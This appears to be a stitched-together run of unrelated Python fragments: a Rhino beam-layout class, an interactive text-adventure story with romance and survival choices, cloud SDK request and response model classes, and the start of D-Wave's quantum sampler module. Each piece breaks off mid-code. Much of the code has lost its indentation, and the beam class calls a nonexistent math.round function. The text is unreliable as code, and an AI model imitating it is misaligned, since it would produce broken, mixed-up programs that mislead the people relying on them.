self.warp_type = warp_type
self.will_flip = will_flip
self.flush_beam_count = flush_beam_count
self.warped_srf = copy.deepcopy(self.surface)
# changing the u_div count in relation to the mapping_type
total_flush_beam_count = math.round(self.seam_type / 2.0) * self.flush_beam_count
self.mapping_pattern_length = len(self.mapping_type)
# checking whether there are enough u_div to map out a surface in the middle
if self.u_div < total_flush_beam_count:
self.main_srf_div = 2
self.u_div = self.main_srf_div * self.mapping_pattern_length + total_flush_beam_count
# checking whether the amount of splits in the middle is a multiple of it's mapping_pattern_len
elif not(int(self.u_div - total_flush_beam_count) % self.mapping_pattern_length == 0):
self.main_srf_div = math.ceil((self.u_div - total_flush_beam_count) / self.mapping_pattern_length)
self.u_div = self.main_srf_div * self.mapping_pattern_length + total_flush_beam_count
# initializing the beam set
self.beams = []
if self.will_flip:
# flip
domain = rg.Interval(0, 1)
self.surface.Reverse(0, True)
self.surface.SetDomain(0, domain)
self.end_isocrvs = [self.surface.GetIsocurve(0, 0), self.surface.GetIsocurve(0, 1)]
# setting up how and what needs to be run in order
# does flipping matter here ???
o_half_t = .5 * self.beam_t
o_flush_seam = (self.flush_beam_count - .5) * self.beam_t
# starting condition of the beam instantiation
self.div_counter = 0
# single - flush condition
if self.seam_type == 0:
# simple even condition
# absolute offset of half the beam_t
self.__offset_sides_surface(offset_dis = o_half_t, sides = 3)
self.__warp_surface()
self.__instantiate_main_beams(start_beams = True, end_beams = True)
# multi - flush condition on the left
elif self.seam_type == 1:
# flush condition on the left
# initializing the flush beams
self.__multi_flush_seams(location = 0)
self.__offset_sides_surface(offset_dis = o_flush_seam, sides = 1)
self.__offset_sides_surface(offset_dis = o_half_t, sides = 2)
self.__warp_sides_surface()
self.__instantiate_main_beams(start_beams = False, end_beams = True)
# multi - flush condition on the right
elif self.seam_type == 2:
# flush condition on the right
self.__offset_sides_surface(offset_dis = o_flush_seam, sides = 2)
self.__offset_sides_surface(offset_dis = o_half_t, sides = 1)
self.__warp_sides_surface()
self.__instantiate_main_beams(start_beams = True, end_beams = False)
# initializing the flush beams
self.__multi_flush_seams(location = 1)
# multi - flush conditon on both sides
elif self.seam_type == 3:
# flush condition on both sides
# initializing the first set of flush conditions
self.__multi_flush_seams(location = 0)
self.__offset_sides_surface(offset_dis = o_flush_seam, sides = 3)
self.__warp_sides_surface()
# initializing the second set of flush conditions
self.__multi_flush_seams(location = 1)
if will_flip:
# flip back
domain = rg.Interval(0, 1)
self.surface.Reverse(0, True)
self.surface.SetDomain(0, domain)
# reversing the direction of the base_plane of the beam
self.beams = list(reversed(self.beams))
def __instantiate_main_beams(self, start_beams = False, end_beams = False):
""" internal method that sets out the beams on the main surface
:param start_beams: Whether the main surface is mapped from the left edge of the surface or skips over the first one
:param end_beams: Whether the main surface is mapped until the end on the right or the last one is ignored
"""
division_range = (int(start_beams) + self.main_srf_div - 1 + int(end_beams))
u_val_list = []
[u_val_list.extend([(u_map_set_val + u_val / division_range) for u_map_set_val in self.mapping_type]) for u_val in range(int(start_beams), int(start_beams) + self.main_srf_div, 1)]
for u in u_val_list:
inner_arr = []
for v in range(self.v_div):
if (self.div_counter % 2 == 0 and v % 2 == 1) or (self.div_counter % 2 == 1 and v % 2 == 0):
continue
p1 = self.warped_srf.PointAt(u, float(v)/self.v_div)
p2 = self.warped_srf.PointAt(u, float(v+1)/self.v_div)
length = p1.DistanceTo(p2)
center = rg.Point3d((p1 + p2) / 2)
_, uu, vv = self.warped_srf.ClosestPoint(center)
normal = self.warped_srf.NormalAt(uu, vv)
x_axis = rg.Vector3d(p1) - rg.Vector3d(p2)
x_axis.Unitize()
y_axis = rg.Vector3d.CrossProduct(normal, x_axis)
plane = rg.Plane(center, x_axis, normal)
beam = Beam(plane, length, self.beam_w, self.beam_t)
inner_arr.append(beam)
self.beams.append(inner_arr)
self.div_counter += 1
    def __multi_flush_seams(self, location = 0, will_flip = False):
        """ Method to create a flush seam with n amount of beams.

        Translates copies of one of the surface's end isocurves along the curve
        plane's normal, one copy per flush beam row, and appends the resulting
        beams to ``self.beams``.

        :param location: Whether you're considering the start (0) or the end (1) of the system (default = 0)
        :param will_flip: What the start condition is (default = False) -- currently unused; TODO confirm it can be removed
        """
        # getting the correct isocurve of the surface (index 0 = start edge, 1 = end edge)
        local_curve = self.end_isocrvs[location]
        # getting the domain of the curve
        t_start, t_end = local_curve.Domain[0], local_curve.Domain[1]
        t_delta = t_end - t_start
        # three sample points (start, middle, end) define the plane of the curve
        t_set = [t_start, (t_end + t_start) / 2, t_end]
        pt_set = [local_curve.PointAt(t_val) for t_val in t_set]
        curve_plane = rg.Plane(pt_set[0], pt_set[1], pt_set[2])
        # getting the t_values on that curve to describe the beam lines
        t_vals = [t_start + t_delta * v / (self.v_div + 1) for v in range (self.v_div + 1)]
        # generating the move vectors for the curves:
        # at the start the rows stack outward (0.5, 1.5, ...) beam thicknesses;
        # at the end they stack inward (negative offsets)
        if (location == 0):
            switch_flag = 0
        else:
            switch_flag = - self.flush_beam_count
        mv_vectors = [curve_plane.ZAxis * self.beam_t * (switch_flag + .5 + i) for i in range(self.flush_beam_count )]
        for mv_vector in mv_vectors:
            # deep-copy so Translate does not mutate the stored end isocurve
            temp_curve = copy.deepcopy(local_curve)
            temp_curve.Translate(mv_vector)
            inner_arr = []
            for v in range(self.v_div):
                # stagger the beams: alternate rows only fill odd / even v cells
                if (self.div_counter % 2 == 0 and v % 2 == 1) or (self.div_counter % 2 == 1 and v % 2 == 0):
                    continue
                p1 = temp_curve.PointAt(t_vals[v])
                p2 = temp_curve.PointAt(t_vals[v + 1])
                length = p1.DistanceTo(p2)
                center = rg.Point3d((p1 + p2) / 2)
                z_axis = curve_plane.ZAxis
                x_axis = rg.Vector3d(p1) - rg.Vector3d(p2)
                x_axis.Unitize()
                y_axis = rg.Vector3d.CrossProduct(z_axis, x_axis)
                plane = rg.Plane(center, x_axis, y_axis)
                beam = Beam(plane, length, self.beam_w, self.beam_t)
                inner_arr.append(beam)
            self.beams.append(inner_arr)
            self.div_counter += 1
def __offset_sides_surface(self , offset_dis=20, rel_or_abs = False, sides = 0, sampling_count = 25):
""" method that returns a slightly shrunk version of the surface along the v direction
:param offset_dis: Offset Distance (abs or relative)
:param rel_or_abs: Flag that states whether you offset the surface absolutely or relative - if relative u domain has to be set correctly!!! (rel = True, abs = False, default = False)
:param sides: Which sides should be offseted (0 = nothing - default, 1 = left, 2 = right, 3 = both)
:param sampling_count: Precision at which the surface should be rebuild
"""
# first of all checking whether you have to do anything at all
if not (sides == 0):
local_srf = self.warped_srf
# case that surface offset is relative
if rel_or_abs:
u_div = local_srf.Domain(0)
if (sides == 1):
offsets = 1
elif (sides == 2):
offsets = 1
elif (sides == 3):
offsets = 2
# making sure you don't make the surface dissappear
if offset_dis * offsets > .9 * u_div:
offset_dis = .9 * u_div / offsets
local_srf.SetDomain(1, rg.Interval(0, sampling_count - 1))
temp_isocurves = [local_srf.IsoCurve(0, v_val) for v_val in range(sampling_count)]
temp_isocurves_shortened = []
for isocurve in temp_isocurves:
# getting the length and the domain of every isocurve
start_t, end_t | |
guys begin to move closer circling around you two. You step to the side so you all form a small circle.
"No idea my mind is completely blank" one of theem says. His voice was incredibly deep considering how young he looked. He had very dark skin and his hair was in these reall nice dreads.
He had a sharp jawline a chiseled beard. "My name's Tyree though, what about you guys?" He was very handsome.
"I'm Tori, I'm from England" Tori smiled.
"I'm Koen, I live in Canada. I can't really remember much though..." Koen, the guy standing next to you says as he rubs the back of his head.
You immediately connect with his accent for it's very similar to yours unlike Tyree's and
Tori's. You look at Koen's hair and can't help but notice how well kept it was. It reminded you of your ex who also had very nice hair.
"Yeah man, my mind is completely out of it. I'm Kevin, can't really remember where I'm from yet. Luck bastards." Kevin playfully smirked, he seemed very warm and playful.
His physique was charming, even you had to admit that much. You felt excited but also overwhelmed
to see yourself surrounded by good looking guys and a girl. You've never been that one good looking girl or anywhere near good looking. You had a very generic face with dark brown eyes and your hair was always tied up in the same bun.
You remembered why you stopped trying on your looks, it was when your ex had dumped you for some girl on the honor roll. Even at twenty years old, a sophomore in college you still haven't managed to get your looks or life together.
"Alright so no one has ANY idea where we are or how we got here?" Tori asks throwing her hands in the air. You then realized how small she was because she wasn't any taller than you. You were only five one which you were both proud of and embarrassed.
You'll probably ask her later just to confirm and it'd serve as good small talk.
"No but my back is killing me, can someone give me a massage?" Kevin laughed obviously in pain.
"Here turn around let me check" Tyree walked over to him and lifted Kevin's shirt up. Kevin groaned and tried to move away but Tyree held him in place. "All I see is your nice tattoo dude."
"I've never gotten a tattoo..." Kevin mumbled.
"Check if I have one." Tyree turned around and lifted his shirt so everyone could see. On his back was a drawing of a puzzle piece with abstract paintings on it.
"Do we all have it?" Tori gasped lifting the back of her shirt to reveal another puzzle piece. Koen quickly followed to also show another puzzle piece. You stubbornly lift your shirt up awkwardly
making sure not to expose the front. You walked closer to them in the circle. You do your best to look behind you and notice all the puzzle pieces seem to fit with each other. Yours fit with Tori and Kevin's which made you feel foolish pride.
"What even is this? Oh dude my mom's gonna kill me." Koen frowned.
"What if this is an experiment?" Tori asked, putting her shirt down.
"Well this is pretty messed up. But if it is then they obviously want us to do something. Prove something." Tyree said running his fingers on his lips.
"Whatever look at where we are, we're in the middle of nowhere. All I see is grass grass grass. Wait" Koen stopped suddenly and pointed behind Kevin. There was a mountain with a forest surrounding it. Although it was extrememly far away
the forest made it seem as if it were closer.
"That's our best shot at finding anything. I can't see anything else." Tori suggested.
"Alright let's start moving then. Everyone in?" Tyreen said, looking at you.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
''')
responseTori = input('"Are you in, yes or no?" Tori asked.')
if responseTori == 'yes':
headingToMountF()
elif responseTori == 'no':
print('You are left behind as they head to the mount. Days later you die from hunger.')
else:
exit()
def headingToMountF():
    """Story branch: the group treks to the mountain, camps overnight, then
    chooses a forest path.

    Reads player choices from stdin. The 'left' path (directly or after running
    from the bear) continues into toLakeF(); other branches end the run.
    """
    print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
    print('You follow them to the mountain. Tyreen had managed to estimate the time using the sun and he said it was around 5 o\'clock meaning that it had been over two hours since they first started walking')
    print('After hours of walking the sun began to fall and night was approaching.')
    print('The five of you agree to continue since you could already see the forest up ahead. Koen had mentioned that there might be "creatures" there that they don\'t know of. You agreed with Tori to sout the area once you got there and set up camp.')
    print('After arriving at the edge of the forest you and Tyreen walk a number of meters away and come back telling everyone it\'d be safe for now.')
    print('You all help bring supplies to Koen who had begun to form a fire and contain it.')
    print('Everyone eventually begins to go to sleep.')
    print('Who do you sleep next to?')
    people = ['tori', 'koen', 'tyree', 'kevin']
    responsePeople = input('')
    # NOTE(review): an invalid name just prints the prompt and returns without
    # re-asking — confirm whether a retry loop is wanted here.
    if responsePeople not in people:
        print('Who do sleep next to? ')
    else:
        print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
        print('The following morning you wake up next to ' + responsePeople)
        print('You all begint to walk into the forest and begin to notice many small animals. You\'ve been walking with ' + responsePeople)
        print('And somehow that\'s made you feel safer while walking.')
        print('Tyree updated everyone everytime a new hour came by. It was around the third hour of walking when you all came across two paths.')
        print('To the left the path seemed to go down a small hill where the trees covered the rest and on the right the path just stretched onto the forest.')
        print('"Which one do we take?" Tori asked. They all gave each other looks and then look back to you')
        answerRL = input('')
        if answerRL == 'left':
            print('You point left and begin to lead the group down the small incline.')
            toLakeF()
        elif answerRL == 'right':
            print('You begin to walk down the right path as the others follow close behind.')
            time.sleep(3)
            print('As you walk carefully through the forest you hear a large growl. Suddenly a beast rises from the bushes. A black bear stands right above you.')
            print('What do you do, Run back or Play dead?')
            bearfight = ['run back', 'play dead']
            answerbear = input('')
            if answerbear == 'run back':
                print('You succesfully run away down the left path, leaving the bear behind.')
                # BUG FIX: was toLake(), an undefined name (NameError at runtime);
                # the lake branch is implemented by toLakeF().
                toLakeF()
            elif answerbear == 'play dead':
                print('You play dead and hope the bear just goes away.')
                time.sleep(3)
                print('However the bear is too smart for that and begins to eat its free meal.')
            else:
                print('What do you do, Run back or play dead?')
        else:
            print('Choose, left or right.')
def toLakeF():
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('You all scurry down the hill and begin to smell a nice auroma that reminds you of the beach. As you all head down the path the smell gets stronger and then you begin to hear noises.')
print('You hear water crash against rocks but very faintly.')
print('Koen begins to run to the sound, you all follow behind except Tori')
print('You decide to stay behind with Tori')
print('You use this oppurtunity to try and get close. What do you say?')
print('')
print('1. "So any sports you into?"')
print('2. "Like any of \'em?"')
toriTalkAnswer = input('')
if toriTalkAnswer == '1':
print('"Well from what I can remember I did like lacrosse. But I think I\'m more of a bookworm to be honest. And given my height I can\'t do many sports." Tori giggled.')
print('"I think we might be the same height. How tall are you?" You ask politely.')
print('"Only five one. I\'m a midget!" She continued to giggle.')
print('"Same!" You begin to laugh with her.')
elif toriTalkAnswer == '2':
print('"Oh | |
if self.update_tenant_req:
self.update_tenant_req.validate()
def to_map(self):
result = dict()
if self.auth_token is not None:
result['auth_token'] = self.auth_token
if self.product_instance_id is not None:
result['product_instance_id'] = self.product_instance_id
if self.nonce is not None:
result['nonce'] = self.nonce
if self.update_tenant_req is not None:
result['update_tenant_req'] = self.update_tenant_req.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_token') is not None:
self.auth_token = m.get('auth_token')
if m.get('product_instance_id') is not None:
self.product_instance_id = m.get('product_instance_id')
if m.get('nonce') is not None:
self.nonce = m.get('nonce')
if m.get('update_tenant_req') is not None:
temp_model = DidUpdateTenantReq()
self.update_tenant_req = temp_model.from_map(m['update_tenant_req'])
return self
class UpdateThingsdidTenantResponse(TeaModel):
    """Response model for the things-DID tenant update call."""

    def __init__(
        self,
        req_msg_id: str = None,
        result_code: str = None,
        result_msg: str = None,
        nonce: str = None,
        executed: bool = None,
    ):
        # Unique request id, used for tracing and troubleshooting.
        self.req_msg_id = req_msg_id
        # Result code; 'OK' generally means the call succeeded.
        self.result_code = result_code
        # Human-readable description of any error.
        self.result_msg = result_msg
        # Transaction id, echoed back from the request.
        self.nonce = nonce
        # Whether this operation ran synchronously
        # (True: fully executed, not an asynchronous call).
        self.executed = executed

    def validate(self):
        """No required fields to check on this model."""
        pass

    def to_map(self):
        """Serialize to a dict, skipping fields that are unset."""
        result = dict()
        for name in ('req_msg_id', 'result_code', 'result_msg', 'nonce', 'executed'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in ('req_msg_id', 'result_code', 'result_msg', 'nonce', 'executed'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class LoadTsmCertificatetsmRequest(TeaModel):
    """Request model for loading a TSM certificate onto a device."""

    def __init__(
        self,
        auth_token: str = None,
        product_instance_id: str = None,
        certificate: str = None,
        device_code: str = None,
        device_model: str = None,
        device_module: str = None,
    ):
        # Authorization token under OAuth mode.
        self.auth_token = auth_token
        self.product_instance_id = product_instance_id
        # The certificate payload.
        self.certificate = certificate
        # Device code (e.g. BOT).
        self.device_code = device_code
        # Device model (e.g. H0).
        self.device_model = device_model
        # Device module (e.g. SE).
        self.device_module = device_module

    def validate(self):
        """Check that the mandatory device fields are present."""
        for name in ('device_code', 'device_model', 'device_module'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        """Serialize to a dict, skipping fields that are unset."""
        result = dict()
        for name in ('auth_token', 'product_instance_id', 'certificate',
                     'device_code', 'device_model', 'device_module'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in ('auth_token', 'product_instance_id', 'certificate',
                     'device_code', 'device_model', 'device_module'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class LoadTsmCertificatetsmResponse(TeaModel):
    """Response model carrying the TSM commands for a certificate load."""

    def __init__(
        self,
        req_msg_id: str = None,
        result_code: str = None,
        result_msg: str = None,
        cmd_list: List[TsmCommonCmd] = None,
    ):
        # Unique request id, used for tracing and troubleshooting.
        self.req_msg_id = req_msg_id
        # Result code; 'OK' generally means the call succeeded.
        self.result_code = result_code
        # Human-readable description of any error.
        self.result_msg = result_msg
        # TSM command list (LoadCertificateTSMCmdResponse implements Serializable).
        self.cmd_list = cmd_list

    def validate(self):
        """Recursively validate every command in cmd_list, when present."""
        for cmd in (self.cmd_list or []):
            if cmd:
                cmd.validate()

    def to_map(self):
        """Serialize to a dict; 'cmd_list' is always emitted (possibly empty)."""
        result = dict()
        for name in ('req_msg_id', 'result_code', 'result_msg'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        result['cmd_list'] = []
        if self.cmd_list is not None:
            for cmd in self.cmd_list:
                result['cmd_list'].append(cmd.to_map() if cmd else None)
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; cmd_list entries are rebuilt as TsmCommonCmd."""
        m = m or dict()
        for name in ('req_msg_id', 'result_code', 'result_msg'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        self.cmd_list = []
        if m.get('cmd_list') is not None:
            for item in m.get('cmd_list'):
                temp_model = TsmCommonCmd()
                self.cmd_list.append(temp_model.from_map(item))
        return self
class LoadTsmResourcefileRequest(TeaModel):
    """Request model for loading a TSM resource file onto a device."""

    def __init__(
        self,
        auth_token: str = None,
        product_instance_id: str = None,
        device_code: str = None,
        device_model: str = None,
        device_module: str = None,
        file_version: str = None,
    ):
        # Authorization token under OAuth mode.
        self.auth_token = auth_token
        self.product_instance_id = product_instance_id
        # Device code (e.g. BOT).
        self.device_code = device_code
        # Device model (e.g. H0).
        self.device_model = device_model
        # Device module (e.g. SE).
        self.device_module = device_module
        # Resource file version.
        self.file_version = file_version

    def validate(self):
        """Check that the mandatory device fields are present."""
        for name in ('device_code', 'device_model', 'device_module'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        """Serialize to a dict, skipping fields that are unset."""
        result = dict()
        for name in ('auth_token', 'product_instance_id', 'device_code',
                     'device_model', 'device_module', 'file_version'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in ('auth_token', 'product_instance_id', 'device_code',
                     'device_model', 'device_module', 'file_version'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class LoadTsmResourcefileResponse(TeaModel):
    """Response model carrying the TSM commands for a resource-file load."""

    def __init__(
        self,
        req_msg_id: str = None,
        result_code: str = None,
        result_msg: str = None,
        app_id: str = None,
        cmd_list: List[TsmCommonCmd] = None,
    ):
        # Unique request id, used for tracing and troubleshooting.
        self.req_msg_id = req_msg_id
        # Result code; 'OK' generally means the call succeeded.
        self.result_code = result_code
        # Human-readable description of any error.
        self.result_msg = result_msg
        # Application id the resource file belongs to.
        self.app_id = app_id
        # TSM command list.
        self.cmd_list = cmd_list

    def validate(self):
        """Recursively validate every command in cmd_list, when present."""
        for cmd in (self.cmd_list or []):
            if cmd:
                cmd.validate()

    def to_map(self):
        """Serialize to a dict; 'cmd_list' is always emitted (possibly empty)."""
        result = dict()
        for name in ('req_msg_id', 'result_code', 'result_msg', 'app_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        result['cmd_list'] = []
        if self.cmd_list is not None:
            for cmd in self.cmd_list:
                result['cmd_list'].append(cmd.to_map() if cmd else None)
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; cmd_list entries are rebuilt as TsmCommonCmd."""
        m = m or dict()
        for name in ('req_msg_id', 'result_code', 'result_msg', 'app_id'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        self.cmd_list = []
        if m.get('cmd_list') is not None:
            for item in m.get('cmd_list'):
                temp_model = TsmCommonCmd()
                self.cmd_list.append(temp_model.from_map(item))
        return self
class StartTlsnotaryTaskRequest(TeaModel):
    """Request model for starting a tlsnotary task."""

    def __init__(
        self,
        auth_token: str = None,
        product_instance_id: str = None,
        task_id: str = None,
        oss_link: str = None,
    ):
        # Authorization token under OAuth mode.
        self.auth_token = auth_token
        self.product_instance_id = product_instance_id
        # Unique business tlsnotary task id.
        self.task_id = task_id
        # OSS link of the hardened file.
        self.oss_link = oss_link

    def validate(self):
        """Check that the mandatory task fields are present."""
        for name in ('task_id', 'oss_link'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        """Serialize to a dict, skipping fields that are unset."""
        result = dict()
        for name in ('auth_token', 'product_instance_id', 'task_id', 'oss_link'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in ('auth_token', 'product_instance_id', 'task_id', 'oss_link'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class StartTlsnotaryTaskResponse(TeaModel):
    """Response model for starting a tlsnotary task."""

    def __init__(
        self,
        req_msg_id: str = None,
        result_code: str = None,
        result_msg: str = None,
        task_id: str = None,
        error_code: int = None,
        error_msg: str = None,
    ):
        # Unique request id, used for tracing and troubleshooting.
        self.req_msg_id = req_msg_id
        # Result code; 'OK' generally means the call succeeded.
        self.result_code = result_code
        # Human-readable description of any error.
        self.result_msg = result_msg
        # Unique business tlsnotary task id.
        self.task_id = task_id
        # Business-level error code.
        self.error_code = error_code
        # Business-level error message.
        self.error_msg = error_msg

    def validate(self):
        """No required fields to check on this model."""
        pass

    def to_map(self):
        """Serialize to a dict, skipping fields that are unset."""
        result = dict()
        for name in ('req_msg_id', 'result_code', 'result_msg',
                     'task_id', 'error_code', 'error_msg'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in ('req_msg_id', 'result_code', 'result_msg',
                     'task_id', 'error_code', 'error_msg'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class QueryTlsnotaryTaskRequest(TeaModel):
def __init__(
self,
auth_token: str = None,
product_instance_id: str = None,
task_id: str = None,
):
# OAuth模式下的授权token
self.auth_token = auth_token
self.product_instance_id = product_instance_id
# 唯一的业务 tlsnotary 任务 id
self.task_id = | |
# Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
"""
A :std:doc:`dimod sampler <oceandocs:docs_dimod/reference/samplers>` for the D-Wave system.
See :std:doc:`Ocean Glossary <oceandocs:glossary>`
for explanations of technical terms in descriptions of Ocean tools.
"""
from __future__ import division
import functools
import time
from warnings import warn
import dimod
from dimod.exceptions import BinaryQuadraticModelStructureError
from dwave.cloud import Client
from dwave.cloud.exceptions import SolverOfflineError, SolverNotFoundError
from dwave.system.warnings import WarningHandler, WarningAction
__all__ = ['DWaveSampler']
def _failover(f):
@functools.wraps(f)
def wrapper(sampler, *args, **kwargs):
while True:
try:
return f(sampler, *args, **kwargs)
except SolverOfflineError as err:
if not sampler.failover:
raise err
try:
# the requested features are saved on the client object, so
# we just need to request a new solver
sampler.solver = sampler.client.get_solver()
# delete the lazily-constructed attributes
try:
del sampler._edgelist
except AttributeError:
pass
try:
del sampler._nodelist
except AttributeError:
pass
try:
del sampler._parameters
except AttributeError:
pass
try:
del sampler._properties
except AttributeError:
pass
except SolverNotFoundError as err:
if sampler.retry_interval < 0:
raise err
time.sleep(sampler.retry_interval)
return wrapper
class DWaveSampler(dimod.Sampler, dimod.Structured):
"""A class for using the D-Wave system as a sampler.
Uses parameters set in a configuration file, as environment variables, or
explicitly as input arguments for selecting and communicating with a D-Wave
system. For more information, see
`D-Wave Cloud Client <https://docs.ocean.dwavesys.com/projects/cloud-client/en/latest/>`_.
Inherits from :class:`dimod.Sampler` and :class:`dimod.Structured`.
Args:
failover (bool, optional, default=False):
Switch to a new QPU in the rare event that the currently connected
system goes offline. Note that different QPUs may have different
hardware graphs and a failover will result in a regenerated
:attr:`.nodelist`, :attr:`.edgelist`, :attr:`.properties` and
:attr:`.parameters`.
retry_interval (number, optional, default=-1):
The amount of time (in seconds) to wait to poll for a solver in
the case that no solver is found. If `retry_interval` is negative
            then it will instead propagate the `SolverNotFoundError` to the
user.
config_file (str, optional):
Path to a configuration file that identifies a D-Wave system and provides
connection information.
profile (str, optional):
Profile to select from the configuration file.
endpoint (str, optional):
D-Wave API endpoint URL.
token (str, optional):
Authentication token for the D-Wave API to authenticate the client session.
solver (dict/str, optional):
Solver (a D-Wave system on which to run submitted problems) to select given
as a set of required features. Supported features and values are described in
:meth:`~dwave.cloud.client.Client.get_solvers`. For backward
compatibility, a solver name, formatted as a string, is accepted.
proxy (str, optional):
Proxy URL to be used for accessing the D-Wave API.
**config:
Keyword arguments passed directly to :meth:`~dwave.cloud.client.Client.from_config`.
Examples:
This example submits a two-variable Ising problem mapped directly to qubits 0
and 1 on a D-Wave system selected by explicitly requiring that it have these two
active qubits. Other required parameters for communication with the system, such
    as its URL and an authentication token, are implicitly set in a configuration file
or as environment variables, as described in
`Configuring a D-Wave System <https://docs.ocean.dwavesys.com/en/latest/overview/dwavesys.html>`_.
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler(solver={'qubits__issuperset': {0, 1}})
>>> sampleset = sampler.sample_ising({0: -1, 1: 1}, {})
>>> for sample in sampleset.samples(): # doctest: +SKIP
... print(sample)
...
{0: 1, 1: -1}
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
def __init__(self, failover=False, retry_interval=-1, **config):
if config.get('solver_features') is not None:
warn("'solver_features' argument has been renamed to 'solver'.", DeprecationWarning)
if config.get('solver') is not None:
raise ValueError("can not combine 'solver' and 'solver_features'")
config['solver'] = config.pop('solver_features')
self.client = Client.from_config(**config)
self.solver = self.client.get_solver()
self.failover = failover
self.retry_interval = retry_interval
warnings_default = WarningAction.IGNORE
"""Defines the default behabior for :meth:`.sample_ising`'s and
:meth:`sample_qubo`'s `warnings` kwarg.
"""
@property
def properties(self):
"""dict: D-Wave solver properties as returned by a SAPI query.
Solver properties are dependent on the selected D-Wave solver and subject to change;
for example, new released features may add properties.
`D-Wave System Documentation <https://docs.dwavesys.com/docs/latest/doc_solver_ref.html>`_
describes the parameters and properties supported on the D-Wave system.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampler.properties # doctest: +SKIP
{u'anneal_offset_ranges': [[-0.2197463755538704, 0.03821687759418928],
[-0.2242514597680286, 0.01718456460967399],
[-0.20860153999435985, 0.05511969218508182],
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
try:
return self._properties
except AttributeError:
self._properties = properties = self.solver.properties.copy()
return properties
@property
def parameters(self):
"""dict[str, list]: D-Wave solver parameters in the form of a dict, where keys are
keyword parameters accepted by a SAPI query and values are lists of properties in
:attr:`.DWaveSampler.properties` for each key.
Solver parameters are dependent on the selected D-Wave solver and subject to change;
for example, new released features may add parameters.
`D-Wave System Documentation <https://docs.dwavesys.com/docs/latest/doc_solver_ref.html>`_
describes the parameters and properties supported on the D-Wave system.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampler.parameters # doctest: +SKIP
{u'anneal_offsets': ['parameters'],
u'anneal_schedule': ['parameters'],
u'annealing_time': ['parameters'],
u'answer_mode': ['parameters'],
u'auto_scale': ['parameters'],
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
try:
return self._parameters
except AttributeError:
parameters = {param: ['parameters']
for param in self.properties['parameters']}
parameters.update(warnings=[])
self._parameters = parameters
return parameters
@property
def edgelist(self):
"""list: List of active couplers for the D-Wave solver.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampler.edgelist # doctest: +SKIP
[(0, 4),
(0, 5),
(0, 6),
(0, 7),
(0, 128),
(1, 4),
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
# Assumption: cloud client nodes are always integer-labelled
try:
edgelist = self._edgelist
except AttributeError:
self._edgelist = edgelist = sorted(set((u, v) if u < v else (v, u)
for u, v in self.solver.edges))
return edgelist
@property
def nodelist(self):
"""list: List of active qubits for the D-Wave solver.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
